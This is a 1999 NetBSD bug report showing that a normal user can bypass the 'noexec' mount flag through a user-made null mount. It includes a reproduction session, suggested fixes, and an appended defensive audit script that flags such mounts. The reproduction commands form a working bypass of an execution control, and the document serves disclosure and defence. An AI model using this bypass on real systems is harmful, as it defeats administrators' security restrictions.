Subject: kern/7129: normal user can bypass mount 'noexec' flags
To: None <gnats-bugs@gnats.netbsd.org>
From: Manuel Bouyer <bouyer@antioche.lip6.fr>
List: netbsd-bugs
Date: 03/11/1999 16:52:50
>Number:         7129
>Category:       kern
>Synopsis:       normal user can bypass mount 'noexec' flags
>Confidential:   no
>Severity:       serious
>Priority:       high
>Responsible:    kern-bug-people (Kernel Bug People)
>State:          open
>Class:          sw-bug
>Submitter-Id:   net
>Arrival-Date:   Thu Mar 11 08:05:00 1999
>Last-Modified:
>Originator:     Manuel Bouyer
>Organization:

LIP6, Universite Paris VI.

>Release:        1.3.3 and the 1.3I i386 snapshot
>Environment:

System: NetBSD antifer.ipv6.lip6.fr 1.3.3 NetBSD 1.3.3 (ANTIFER) #1: Sun Feb 28 17:30:48 MET 1999 bouyer@antifer.ipv6.lip6.fr:/usr/src/NetBSD/src/sys/arch/i386/compile/ANTIFER i386

>Description:
	It is possible for a normal user to bypass the 'noexec' mount flag,
	by using a null mount on a directory owned by itself.
>How-To-Repeat:
	garfield:/cd1>id
	uid=331(bouyer) gid=100 groups=100, 0(wheel)
	garfield:/cd1>pwd 
	/cd1
	garfield:/cd1>mount | fgrep cd1
	/dev/wd1a on /cd1 type ffs (NFS exported, local, nodev, noexec)
	garfield:/cd1>ls -l
	total 3
	-rwxr-xr-x   1 bouyer  wheel   30 Mar 11 16:39 toto.sh
	garfield:/tmp/d>cat toto.sh 
	#! /bin/sh
	echo "not good !"

	garfield:/cd1>./toto.sh 
	./toto.sh: Permission denied.
	garfield:/cd1>mkdir /tmp/d
	garfield:/cd1>mount -t null /cd1 /tmp/d
	garfield:/cd1>cd !$
	cd /tmp/d
	garfield:/tmp/d>./toto.sh 
	not good !

>Fix:
	Workaround: ensure no regular user can execute a binary in a partition
	they can write (what's the purpose of 'noexec' otherwise?), and
	suppress read/execute permissions on /sbin/mount_* for all but owner.

	A long term fix needs to change the semantic of mount for non-root
	users: 
	- mounts for non-root users are always 'noexec' (as they already are
	  'nodev, nosuid'), possibly dependent on the kernel security level
	- or inherit the noexec flag from the partition the target directory
	  will be mounted on.
>Audit-Trail:
>Unformatted:
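
An audit sketch for the condition described in this report, added here as an example and not part of the original PR or of NetBSD: it reads mount(8)-style output and lists null mounts that lack 'noexec' while the mount holding their source directory has it. The function names, the sample lines other than the /cd1 one, and the assumed form of a null-mount line are constructed for illustration.

```sh
# Flag null mounts that lack noexec although the filesystem holding their
# source directory is mounted noexec (the condition reported in kern/7129).

# Constructed sample; only the first line appears in the report itself.
sample_mount_output() {
    cat <<'EOF'
/dev/wd1a on /cd1 type ffs (NFS exported, local, nodev, noexec)
/dev/wd0a on / type ffs (local)
/cd1 on /tmp/d type null (nodev, nosuid)
/cd1 on /tmp/safe type null (nodev, nosuid, noexec)
/usr/pkg on /mnt/pkg type null (local)
EOF
}

# stdin: lines "<source> on <mountpoint> type <fstype> (<flag>, ...)"
# stdout: "<null mountpoint> <source> <noexec mount covering the source>"
# Assumes mount points and sources contain no whitespace.
audit_null_mounts() {
    awk '
    # Longest recorded mount point that is a path prefix of p.
    function covering(p,    i, m, best) {
        for (i = 1; i <= n; i++) {
            m = order[i]
            if ((m == "/" || p == m || index(p, m "/") == 1) &&
                length(m) > length(best))
                best = m
        }
        return best
    }
    $2 == "on" && $4 == "type" {
        flags = $0
        sub(/^[^(]*\(/, "", flags)
        sub(/\).*$/, "", flags)
        noexec[$3] = ((", " flags ", ") ~ /, noexec,/)
        srcof[$3] = $1
        fstype[$3] = $5
        order[++n] = $3
    }
    END {
        for (k = 1; k <= n; k++) {
            mp = order[k]
            if (fstype[mp] != "null" || noexec[mp]) continue
            c = covering(srcof[mp])
            if (c != "" && noexec[c]) print mp, srcof[mp], c
        }
    }'
}

sample_mount_output | audit_null_mounts
```

On a live system the input would be `mount | audit_null_mounts`; an empty result means every null mount listed either carries 'noexec' itself or has a source that is not under a 'noexec' mount.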